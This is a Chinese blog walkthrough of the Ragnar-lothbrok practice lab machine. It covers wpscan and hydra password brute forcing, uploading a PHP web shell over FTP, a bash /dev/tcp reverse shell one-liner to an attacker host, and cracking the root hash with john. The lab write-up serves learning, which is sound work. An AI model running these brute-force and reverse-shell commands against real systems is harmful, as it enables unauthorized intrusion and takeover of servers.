Ragnar-lothbrok 靶机

最新推荐文章于 2024-09-14 13:45:00 发布
最新推荐文章于 2024-09-14 13:45:00 发布
阅读量150 收藏
点赞数
分类专栏: 渗透测试 文章标签: web安全 网络安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134048294
版权

Ragnar-lothbrok

信息搜集

存活检测

image-20231025221132716

详细扫描

image-20231025221227283

后台网页扫描

image-20231025221253760

网站信息搜集

  • secret “秘密”网页

    image-20231025221349345

    将密文保存到 password.txt

  • 此页面使用了 wordpress CMS

    image-20231025221836685

  • 疑似用户 ragnar

  • wpscan 也爆破出了用户 ragnar

    wpscan --url http://10.4.7.155/wordpress/ --enumerate u

    image-20231025222706934

密码获取

  • 尝试利用搜集的用户名和密码爆破网站、ftp、ssh 密码

尝试网页登录爆破

wpscan --url http://10.4.7.155/wordpress/ --usernames ragnar --passwords password.txt

爆破出密码 ubbe

image-20231025223612116

ssh 爆破

hydra -l ragnar -P password.txt ssh://10.4.7.155

ragnar 密码为 lagertha

image-20231025224147806

漏洞利用

  • 查看 ftp 中有用的信息

    image-20231025224457074

  • 未搜集到有用信息

  • 网页登录

    10.4.7.155/wordpress/wp-login.php

ragnar
ubbe

    image-20231025224606889

    卡的登不上去

    image-20231025225020665

  • 直接尝试 ftp 上传一句话木马

    image-20231025224952782

    put shell.php

    成功上传

    image-20231025225149229

  • 蚁剑连接,发现可以连接

    image-20231025225311439

  • 打开蚁剑中虚拟终端,反弹进 kali

    bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'

    image-20231025225553201

    成功反弹

提权

  • 信息搜集

    切换到 home 目录,发现有用户 ragnar

    image-20231025230050152

  • 尝试使用其 web 和 ftp 密码登录

    密码未 ftp 登陆密码 lagertha

    image-20231025230236343

  • 查找敏感文件

    在 秘密 文件中可以直接看到 root 加密后的密码

    image-20231025230835014

  • john 爆破

  • 切换 root

    成功提权

    image-20231026091720785

    image-20231026091711015

gjl_
关注
专栏目录
ragnar:Ragnar git访问系统
05-15
要求 需要Nodejs 8 MongoDB 3.2 安装依赖项 npm install 源代码lint eslint用于加载javascript源代码: npm run lint 终点 POST / admin / login-管理员登录 POST / admin / users-通过admin保存用户,例如admin...
awesome-pion:精选与Pion相关的令人敬畏的事物
05-13
很棒的介子 精选与Pion相关的令人敬畏的事物 资源 社区 官方常见问题 官方Slack频道 ... Ragnar-H / TelloGo Deepch / RTSPtoWebRTC giongto35 / cloud-game kdevb0x / quikface 机械加工/我的家 dialup-i
Ragnar-lothbrok靶机总结
qq_45301512的博客
01-29 578
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到靶机开放了21端口,80端口,443端口,3306端口一般开放21端口,我们可以先尝试ftp的匿名登录可以看到并不能使用ftp的匿名登录紧接着从网站入手,根据80端口打开网站网站上并不能发现漏洞利用点信息收集,目录爆破一波发现了一个secret文件,里面存放密码字典并且还有个wordpress目录,打开了新网站,发现了一个用户名。
vulnhub:Ragnar-lothbrok
weixin_45922278的博客
03-09 594
描述 Google && Wikipedia是您的朋友 难度:容易 “当小猪知道公猪遭受了怎样的痛苦时,他们会如何尖叫” 请添加/ etc / hosts-> ip vm + armbjorn 推特:@ArmBjorn 在Virtualbox中工作。 获取root权限 一、信息收集 1.nmap端口扫描 2.http服务目录扫描器 python3 dirsearch.py -u http://192.168.152.130 -e php ...
Vulnhub靶机_RAGNAR LOTHBROK: 1
学术渣渣的博客
03-22 3968
靶机 RAGNAR LOTHBROK:1
vulnhub靶场之RAGNAR LOTHBROK: 1
weixin_42478365的博客
05-29 764
wordpress用户登录爆破,ftp用户密码爆破,john爆破hash密码
VulnHub靶机渗透实战9-vikings
随心所欲不逾矩
11-25 818
本次靶机是CTF风格的靶机。靶场地址:Vikings: 1 ~ VulnHub fcrackzip工具也能用来爆破密码。 用户名密码:floki/f@m0usboatbuilde7 所以boat的意思是让我们对第二十九个质数做考拉兹猜想,所得到的数的数列,其中可打印的字符(ascall可以代表的字符,256以内),就是我们要得到的首先我们编写一段简单的python代码来计算出第二十九个质数。 再编写一个简单python做考拉兹猜想,并且输出所有ascall为256以内的字
Vulnhub: Ragnar Lothbrok: 1靶机
qq_43884092的博客
08-30 862
secret目录收集密码字典,wordpress后台爆破,ftp爆破,john爆破root密码密文
靶机渗透练习10-Vkings
hirak0的博客
04-15 1073
靶机描述 靶机地址:https://www.vulnhub.com/entry/vikings-1,741/ Description A CTF machine with full of challenges Do what is visible, no rabbit holes Learn new things, and make sure that you enum first then hack. Discord- luckythandel#6053 {for any-hint} This work
Ragnar Locker 勒索软件分析报告
sxr__nc的博客
03-26 591
Vikings靶机打靶过程及思路
qq_52610024的博客
05-02 860
ss-pantu|grep18812发现开启,并且是本机127.0.0.1,所以代码需要在靶机上运行。7.将数字进行ASCII编码还原,将得到的字符串进行ssh登录,发现进入后进行自动sudo。先bin/bash-i进行提权,查看运行脚本的文件,里面运用了rpyc远程管理。boat文件里面给出提示是考拉兹猜想,进行质数查找,编写简单的素数判断程序。5.发现解压后有图片文件,思考是否有隐写数,使用工具进行探测隐写。侦探发现是一个zip压缩文件,下载保存后进行解压发现需要密码。...
Ragnarok Online Linux Client-开源
04-27
Ragnarok Online Linux Client-开源》是一款专为Linux及任何Unix系统设计的API,旨在让用户在这些操作系统中能够顺畅地接入和体验Ragnarök Online世界。Ragnarök Online是一款深受玩家喜爱的大型多人在线角色...
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2282
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1935
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 666
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-14 817
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 944
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
ragnar's story is true or is just a myth?
03-28
As an AI language model, I cannot determine if Ragnar's story is true or just a myth as there is no concrete evidence to support either claim. Ragnar is a figure from Norse mythology, and while some historical accounts mention a possible historical figure named Ragnar, many of the stories about him are likely embellished or entirely fictionalized.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值